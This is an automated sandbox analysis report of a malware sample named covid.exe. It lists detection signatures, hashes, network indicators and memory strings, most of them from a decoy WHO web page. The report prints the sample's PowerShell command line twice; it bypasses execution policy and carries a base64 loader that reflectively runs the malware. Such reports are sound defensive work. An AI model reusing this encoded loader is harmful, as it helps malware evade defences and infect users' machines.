Analysis Report covid.exe

Overview

General Information

Sample Name: covid.exe
Analysis ID: 379751
MD5: a990c03d14bef241e880d6167fa5a6aa
SHA1: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
Infos:

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Encoded PowerShell Command Line
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
Yara detected Powershell Load Encrypted Assembly
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: covid.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: covid.exe Virustotal: Detection: 15% Perma Link
Source: covid.exe ReversingLabs: Detection: 34%
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.covid.exe.c70000.0.unpack Avira: Label: TR/Dropper.Gen2

Compliance:

barindex
Uses 32bit PE files
Source: covid.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: covid.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605D1B8 FindFirstFileExW, 13_2_00007FF68605D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW, 18_2_00007FF6FE11D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW, 29_2_00007FF7E3D7D1B8

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000001.00000002.281304560.000001A414536000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatarame
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory:
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.111.9.35 23.111.9.35
Source: Joe Sandbox View IP Address: 23.111.9.35 23.111.9.35
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: base[1].js.7.dr String found in binary or memory: "s.youtube.com"===t&&(t=OD(this.va)||"www.youtube.com")):t="video.google.com";this.Qj=t;PD(this,a,!0);this.L=new XC;g.H(this,this.L);t=b?b.innertubeApiKey:tD("",a.innertube_api_key);r=b?b.innertubeApiVersion:tD("",a.innertube_api_version);p=b?b.innertubeContextClientVersion:tD("",a.innertube_context_client_version);this.Mf={innertubeApiKey:uo("INNERTUBE_API_KEY")||t,innertubeApiVersion:uo("INNERTUBE_API_VERSION")||r,cH:g.M("INNERTUBE_CONTEXT_CLIENT_CONFIG_INFO"),dH:this.deviceParams.c,innertubeContextClientVersion:uo("INNERTUBE_CONTEXT_CLIENT_VERSION")|| equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: (g.Km(b,"www.youtube.com"),c=b.toString()):c=mw(c);b=new Dy(c);b.set("cmo=pf","1");d&&b.set("cmo=td","a1.googlevideo.com");return b}; equals www.youtube.com (Youtube)
Source: FL794448.htm.7.dr String found in binary or memory: <iframe width="560" height="315" src="https://www.youtube.com/embed/yEIPefMsf70" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen title="WHO: A global response to a global pandemic"></iframe> equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: Mga=function(a,b){if(!a.i["0"]){var c=new lB("0","fakesb",void 0,new hB(0,0,0,void 0,void 0,"auto"),null,null,1);a.i["0"]=b?new tA(new Dy("http://www.youtube.com/videoplayback"),c,"fake"):new dB(new Dy("http://www.youtube.com/videoplayback"),c,new aA(0,0),new aA(0,0),0,NaN)}}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.YD=function(a){a=OD(a.va);return"www.youtube-nocookie.com"===a?"www.youtube.com":a}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.k.clone=function(){var a=new Om;a.u=this.u;this.i&&(a.i=this.i.clone(),a.l=this.l);return a};var Vm="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),vda=/\bocr\b/;var wda=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;var UD={f_:"LIVING_ROOM_APP_MODE_UNSPECIFIED",c_:"LIVING_ROOM_APP_MODE_MAIN",b_:"LIVING_ROOM_APP_MODE_KIDS",d_:"LIVING_ROOM_APP_MODE_MUSIC",e_:"LIVING_ROOM_APP_MODE_UNPLUGGED",a_:"LIVING_ROOM_APP_MODE_GAMING"};Ym.prototype.set=function(a,b){b=void 0===b?!0:b;0<=a&&52>a&&0===a%1&&this.i[a]!=b&&(this.i[a]=b,this.l=-1)}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.k.getVideoUrl=function(a,b,c,d,e){b={list:b};c&&(e?b.time_continue=c:b.t=c);c=g.ZD(this);d&&"www.youtube.com"===c?d="https://youtu.be/"+a:g.JD(this)?(d="https://"+c+"/fire",b.v=a):(d=this.protocol+"://"+c+"/watch",b.v=a,nq&&(a=Ap())&&(b.ebc=a));return g.Id(d,b)}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.oE=function(a){var b=g.ZD(a);!a.ea("yt_embeds_disable_new_error_lozenge_url")&&kha.includes(b)&&(b="www.youtube.com");return a.protocol+"://"+b}; equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: g.yM.prototype.l=function(a){var b=this;$na(this);var c=a.wA,d=this.api.T();"GENERIC_WITHOUT_LINK"!==c||d.I?"TOO_MANY_REQUESTS"===c?(d=this.api.getVideoData(),this.bd(BM(this,"TOO_MANY_REQUESTS_WITH_LINK",d.Vm(),void 0,void 0,void 0,!1))):"HTML5_NO_AVAILABLE_FORMATS_FALLBACK"!==c||d.I?this.bd(g.zM(a.errorMessage)):this.bd(BM(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(a=d.hostLanguage,c="//support.google.com/youtube/?p=player_error1",a&&(c= equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: gia(this.videoData),this.V("highrepfallback");else if(a.i){b=this.l?this.l.l.l:null;if(Rva(a)&&b&&b.isLocked())var d="FORMAT_UNAVAILABLE";else if(!this.i.I&&"auth"===a.errorCode&&"429"===a.details.rc){d="TOO_MANY_REQUESTS";var e="6"}this.V("playererror",a.errorCode,d,g.KB(a.details),e)}else d=/^pp/.test(this.videoData.clientPlaybackNonce),oU(this,a.errorCode,a.details),d&&"manifest.net.connect"===a.errorCode&&(a="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+ equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: h,l,"Trusted Ad Domain URL");this.Da=U(!1,a.privembed);this.protocol=0===this.Gc.indexOf("http:")?"http":"https";this.va=hw((b?b.customBaseYoutubeUrl:a.BASE_YT_URL)||"")||hw(this.Gc)||this.protocol+"://www.youtube.com/";l=b?b.eventLabel:a.el;h="detailpage";"adunit"===l?h=this.l?"embedded":"detailpage":"embedded"===l||this.u?h=rD(h,l,hha):l&&(h="embedded");this.Ca=h;xp();l=null;h=b?b.playerStyle:a.ps;var m=g.fb(xD,h);!h||m&&!this.u||(l=h);this.playerStyle=l;this.J=(this.I=g.fb(xD,this.playerStyle))&& equals www.youtube.com (Youtube)
Source: base[1].js.7.dr String found in binary or memory: oJ.prototype.replace=function(a,b){a=g.q(a);for(var c=a.next();!c.done;c=a.next())delete this.i[c.value.encryptedTokenJarContents];kka(this,b)};pJ.prototype.Zo=function(a){var b,c,d=null===(b=a.responseContext)||void 0===b?void 0:b.locationPlayabilityToken;void 0!==d&&(this.locationPlayabilityToken=d,this.i=void 0,"TVHTML5"===(null===(c=a.responseContext)||void 0===c?void 0:c.clientName)?(this.localStorage=lka(this))&&this.localStorage.set("yt-location-playability-token",d,15552E3):g.Sq("YT_CL",JSON.stringify({t6:d}),15552E3,void 0,!0))};var sJ;g.v(rJ,Mr);rJ.prototype.ow=function(a,b){a=Mr.prototype.ow.call(this,a,b);return Object.assign(Object.assign({},a),this.i)};var Bka=/[&\?]action_proxy=1/,Aka=/[&\?]token=([\w-]*)/,Cka=/[&\?]video_id=([\w-]*)/,Dka=/[&\?]index=([\d-]*)/,Eka=/[&\?]m_pos_ms=([\d-]*)/,Hka=/[&\?]vvt=([\w-]*)/,vka="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),Fka="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),xka={android:"ANDROID", equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.who.int
Source: mobsync.exe, mobsync.exe, 00000014.00000002.340204624.0000023F81490000.00000040.00000001.sdmp String found in binary or memory: http://code.jquery.com/
Source: powershell.exe, 00000001.00000002.292130964.000001A42AF59000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: fa-regular-400[1].eot.7.dr String found in binary or memory: http://fontello.com
Source: fa-regular-400[1].eot.7.dr String found in binary or memory: http://fontello.comFont
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: FL794448.htm.7.dr String found in binary or memory: http://schema.org
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.265257231.000001A412EE1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msapplication.xml.6.dr String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: FL794448.htm.7.dr String found in binary or memory: http://www.emro.who.int/index.html
Source: FL794448.htm.7.dr String found in binary or memory: http://www.euro.who.int/en/home
Source: msapplication.xml2.6.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml6.6.dr String found in binary or memory: http://www.wikipedia.com/
Source: base[1].js.7.dr String found in binary or memory: http://www.youtube.com/videoplayback
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/drm/2012/10/10
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/streaming/otf/durations/112015
Source: base[1].js.7.dr String found in binary or memory: http://youtube.com/yt/2012/10/10
Source: base[1].js.7.dr String found in binary or memory: https://admin.youtube.com
Source: analytics[1].js.7.dr String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: FL794448.htm.7.dr String found in binary or memory: https://app.powerbi.com/
Source: FL794448.htm.7.dr String found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
Source: FL794448.htm.7.dr String found in binary or memory: https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.pn
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: FL794448.htm.7.dr String found in binary or memory: https://covid19.who.int/
Source: base[1].js.7.dr String found in binary or memory: https://docs.google.com/get_video_info
Source: powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.286213203.000001A423649000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: base[1].js.7.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/osd.js
Source: FL794448.htm.7.dr String found in binary or memory: https://platform.twitter.com/widgets.js
Source: base[1].js.7.dr String found in binary or memory: https://redux.js.org/api/store#subscribelistener
Source: FL794448.htm.7.dr String found in binary or memory: https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5803f964fe6c9599
Source: FL794448.htm.7.dr String found in binary or memory: https://schema.org
Source: analytics[1].js.7.dr String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/?p=missing_quality
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/?p=noaudio
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/?p=report_playback
Source: base[1].js.7.dr String found in binary or memory: https://support.google.com/youtube/answer/6276924
Source: analytics[1].js.7.dr String found in binary or memory: https://tagassistant.google.com/
Source: base[1].js.7.dr String found in binary or memory: https://viacon.corp.google.com
Source: FL794448.htm.7.dr String found in binary or memory: https://www.afro.who.int/
Source: analytics[1].js.7.dr String found in binary or memory: https://www.google-analytics.com/debug/bootstrap
Source: analytics[1].js.7.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: analytics[1].js.7.dr String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: base[1].js.7.dr String found in binary or memory: https://www.googleapis.com/certificateprovisioning/v1/devicecertificates/create?key=AIzaSyB-5OLKTx2i
Source: analytics[1].js.7.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-5QFSQRT
Source: FL794448.htm.7.dr String found in binary or memory: https://www.paho.org/hq/index.php?lang=en
Source: powershell.exe, 00000001.00000003.262923135.000001A42AFB3000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmp, FL794448.htm.7.dr String found in binary or memory: https://www.who.int
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-blue.svg
Source: powershell.exe, 00000001.00000002.293621546.000001A42B1B0000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/T
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/about/governance/world-health-assembly/seventy-third-world-health-assembly
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/about/what-we-do/who-brochure
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/about/who-we-are/privacy-policy
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ar/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/campaigns/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/campaigns/connecting-the-world-to-combat-coronavirus/how-to-report-misinformatio
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/emergencies/crises/cod/en/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timeline
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/es/home
Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/f
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/fr/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/home/search?indexCatalogue=genericsearchindex1&wordsMode=AnyWord&searchQuery=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ictrp/search/en/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/images/default-source/infographics/logo-who.tmb-1200v.jpg?Culture=en&amp;sfvrsn=
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news-room/events
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news-room/releases
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/news/item#:ItemDefaultUrl
Source: powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmp String found in binary or memory: https://www.who.int/nt/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/pt/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/publications/en/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/data/announcement/world-health-statistics-2020
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/emergencies/democratic-republic-of-the-cong
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboard
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/page/novel-coronavirus-(covid-19)-situation-dashboard
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ru/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/southeastasia
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/westernpacific/
Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/zh/home
Source: FL794448.htm.7.dr String found in binary or memory: https://www.youtube.com/embed/yEIPefMsf70
Source: base[1].js.7.dr String found in binary or memory: https://www.youtube.com/generate_204?cpn=
Source: base[1].js.7.dr String found in binary or memory: https://youtu.be/
Source: base[1].js.7.dr String found in binary or memory: https://youtube.com/api/drm/fps?ek=uninitialized
Source: base[1].js.7.dr String found in binary or memory: https://youtubei.googleapis.com/youtubei/
Source: base[1].js.7.dr String found in binary or memory: https://yurt.corp.google.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2

E-Banking Fraud:

barindex
Malicious encrypted Powershell command line found
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgAC